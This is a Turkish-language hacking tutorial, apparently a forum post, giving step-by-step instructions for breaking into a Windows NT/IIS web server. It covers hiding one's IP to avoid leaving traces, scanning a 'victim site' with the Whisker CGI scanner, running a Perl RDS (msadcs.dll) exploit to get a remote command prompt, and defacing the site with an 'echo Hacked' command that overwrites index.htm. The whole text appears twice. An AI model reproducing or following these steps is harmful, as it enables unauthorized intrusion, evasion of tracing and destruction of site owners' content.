----Saldiri Asamlari----
Öncelikle bir Nt server'a saldiracagiz.Bunun için WinNt kullanmanmamiz en
dogru olani ama saldiracagimiz
sistemde Windows oldugu için bu seferlik sorun yok
öncelikle gereli olan dökümanlari temin ediyoruz
activeperl*herhangi bitane ip gizleme programi yada proxy*winNT server için exploit( sadece bu sistem için frkli server için uygulayacaksaniz yöntem yine ayni sadece o server uygun exploit bulmak kaliyor).
Cgi Hole Vulnerability Scanner(whisker tercih edilir. google da whisker diye aratin mutlaka bulursunuz).
Ve basliyoruz.
1- www.activeperl.com l ink inden activerperl indiriyoruz. activeperl indirmemimizn nedeni exploit imizin perl dilinde yazilmis olmasidir.
2- download ettigimiz ip gizleme programiyla ip mizi gizliyoruz. ip gizlememnin yukarda belirttigim gibi bir çok yolu vardir.
ip nizi gizledigini sayiyor vede ip gizleme konusunu halletmis sayarak devam ediyorum.
Not: kesinle ip nizi gizlemeden exploiti kullanmaya kalkmayin ii mizi gizlemenin nedeni sisteme girdikten sonra iz birakmadan sistemden çikmadiktir.
3-cgi scanner iyi önceden belirledigimiz kurbani taratiyoruz
karsimiza çikan yazilari kopyalayin daha sonra not defterini içine atin dosyayi farkli kaydet deyip wisker.pl yapin
not:uzantisi mutlaka .pl oalcak aksi taktirde exploitiniz derlenmez.
dos komut sistemini açiyoruz. sirasiyla:
c:\Windows>cd..
c:\Windows>cd perl
c:\Windows>cd bin
bu komutlari giriyoruz.Sonra daha önceden belirledigimiz kurban
sayfamizi bu sekilde açiklara karsi tariyoruz.
c:/perl/bin/perl whisker.pl -h http://www.kurbansite.com(yadawww.kurbansite.com(yada[/URL] Ip) yazip enter diyoruz. bir müddet bekledikten sonra
karsimiza söyle bir yazi gelecek
Hostname:kurbansayfa.com
Server:IIS
burda önemli olan server yazisindan sonra ISS gelmesidir (Internet Information Server)
taramamiz bitti sayiyor vede devam ediyorum. tarama bittiginde söyle bir mesajla karsialmis olmaz gerekir.
+200 GET /whisker.ida
+200 GET /whisker.idq
+200 GET /scripts/tools/newdns.exe
+200 GET /msadc/msadcs.dll
bunlar sistemde bulunan açiklar burda isimize yaracak olan:
/whisker.ida
/whisker.idq
bun açiklarin ikisde ayni ise yarar amaçlari server a böyle bir komut göndererek server a hata mesaji vermesidir.
4 vede son ASAMA:
sira geldi exploit imizi kullanmaya
yukarida yaptigimiz
gibi not defterini açip yapistiriyoruz farkli kaydette exploit(yada farkli biri isim).pl ismiyle
c:\Perl\bin dizinine kaydediyoruz.
Sonra dos'u açip
c:\Windows>cd..
c:\Windows>cd perl
c:\Windows>cd bin
sonra
c:\Perl\Bin>perl exploti(yada farkli biri isim).pl -h www.kurbansayfa.com yaziyoruz o sisteme
baglanirken sizde Explorer'a geçip
giris sayfasinin ne oldugunu ögreniyorsunuz bunun için
www.kurbansayfa.com/index.htm
www.kurbansayfa.com/index.html
www.kurbansayfa.com/index.asp
www.kurbansayfa.com/default.htm
www.kurbansayfa.com/default.html
www.kurbansayfa.com/default.asp
ben index.htm oldugunu varsayarak devam ediyorum.
tekrar dos penceresine baktigimzda RDS c:/ karsilasiyoruz. bu demektirki buradan WinNt'de Dos komut sistemine erisim sagladigimizi anliyoruz.
not:Rds c:/ yazmasinin nedeni kulalndigimiz explotin Rds exploit olmasi yani okadar önemli deyil yamzasi nokta artik server içindeyiz.
server a istedigimizi yapabiliriz.(silme*dizin olusturma*kopyalama* yönlendirme)...
birkaç örnek
RDS c\echo Hacked> c:\Inetpub\wwwroot\index.htm
yaziyoruz bunun açiklamasi sudur.
echo:bir dos komutudur komut sisteminde söyle yazarsaniz
echo hacked
not: > bu isaret önemli mutkala olmasi lazim.
bu komut ekrana hacked yazisini basacaktir.
echo Bu komut metin tabanli bir dosyada
uygulandiginda(txt*html*asp..)
o dosyanin tüm içerigini silip bizim yazdigimiz yaziyi yazacaktir.
Öncelikle bir Nt server'a saldiracagiz.Bunun için WinNt kullanmanmamiz en
dogru olani ama saldiracagimiz
sistemde Windows oldugu için bu seferlik sorun yok
öncelikle gereli olan dökümanlari temin ediyoruz
activeperl*herhangi bitane ip gizleme programi yada proxy*winNT server için exploit( sadece bu sistem için frkli server için uygulayacaksaniz yöntem yine ayni sadece o server uygun exploit bulmak kaliyor).
Cgi Hole Vulnerability Scanner(whisker tercih edilir. google da whisker diye aratin mutlaka bulursunuz).
Ve basliyoruz.
1- www.activeperl.com l ink inden activerperl indiriyoruz. activeperl indirmemimizn nedeni exploit imizin perl dilinde yazilmis olmasidir.
2- download ettigimiz ip gizleme programiyla ip mizi gizliyoruz. ip gizlememnin yukarda belirttigim gibi bir çok yolu vardir.
ip nizi gizledigini sayiyor vede ip gizleme konusunu halletmis sayarak devam ediyorum.
Not: kesinle ip nizi gizlemeden exploiti kullanmaya kalkmayin ii mizi gizlemenin nedeni sisteme girdikten sonra iz birakmadan sistemden çikmadiktir.
3-cgi scanner iyi önceden belirledigimiz kurbani taratiyoruz
karsimiza çikan yazilari kopyalayin daha sonra not defterini içine atin dosyayi farkli kaydet deyip wisker.pl yapin
not:uzantisi mutlaka .pl oalcak aksi taktirde exploitiniz derlenmez.
dos komut sistemini açiyoruz. sirasiyla:
c:\Windows>cd..
c:\Windows>cd perl
c:\Windows>cd bin
bu komutlari giriyoruz.Sonra daha önceden belirledigimiz kurban
sayfamizi bu sekilde açiklara karsi tariyoruz.
c:/perl/bin/perl whisker.pl -h http://www.kurbansite.com(yadawww.kurbansite.com(yada[/URL] Ip) yazip enter diyoruz. bir müddet bekledikten sonra
karsimiza söyle bir yazi gelecek
Hostname:kurbansayfa.com
Server:IIS
burda önemli olan server yazisindan sonra ISS gelmesidir (Internet Information Server)
taramamiz bitti sayiyor vede devam ediyorum. tarama bittiginde söyle bir mesajla karsialmis olmaz gerekir.
+200 GET /whisker.ida
+200 GET /whisker.idq
+200 GET /scripts/tools/newdns.exe
+200 GET /msadc/msadcs.dll
bunlar sistemde bulunan açiklar burda isimize yaracak olan:
/whisker.ida
/whisker.idq
bun açiklarin ikisde ayni ise yarar amaçlari server a böyle bir komut göndererek server a hata mesaji vermesidir.
4 vede son ASAMA:
sira geldi exploit imizi kullanmaya
yukarida yaptigimiz
gibi not defterini açip yapistiriyoruz farkli kaydette exploit(yada farkli biri isim).pl ismiyle
c:\Perl\bin dizinine kaydediyoruz.
Sonra dos'u açip
c:\Windows>cd..
c:\Windows>cd perl
c:\Windows>cd bin
sonra
c:\Perl\Bin>perl exploti(yada farkli biri isim).pl -h www.kurbansayfa.com yaziyoruz o sisteme
baglanirken sizde Explorer'a geçip
giris sayfasinin ne oldugunu ögreniyorsunuz bunun için
www.kurbansayfa.com/index.htm
www.kurbansayfa.com/index.html
www.kurbansayfa.com/index.asp
www.kurbansayfa.com/default.htm
www.kurbansayfa.com/default.html
www.kurbansayfa.com/default.asp
ben index.htm oldugunu varsayarak devam ediyorum.
tekrar dos penceresine baktigimzda RDS c:/ karsilasiyoruz. bu demektirki buradan WinNt'de Dos komut sistemine erisim sagladigimizi anliyoruz.
not:Rds c:/ yazmasinin nedeni kulalndigimiz explotin Rds exploit olmasi yani okadar önemli deyil yamzasi nokta artik server içindeyiz.
server a istedigimizi yapabiliriz.(silme*dizin olusturma*kopyalama* yönlendirme)...
birkaç örnek
RDS c\echo Hacked> c:\Inetpub\wwwroot\index.htm
yaziyoruz bunun açiklamasi sudur.
echo:bir dos komutudur komut sisteminde söyle yazarsaniz
echo hacked
not: > bu isaret önemli mutkala olmasi lazim.
bu komut ekrana hacked yazisini basacaktir.
echo Bu komut metin tabanli bir dosyada
uygulandiginda(txt*html*asp..)
o dosyanin tüm içerigini silip bizim yazdigimiz yaziyi yazacaktir.
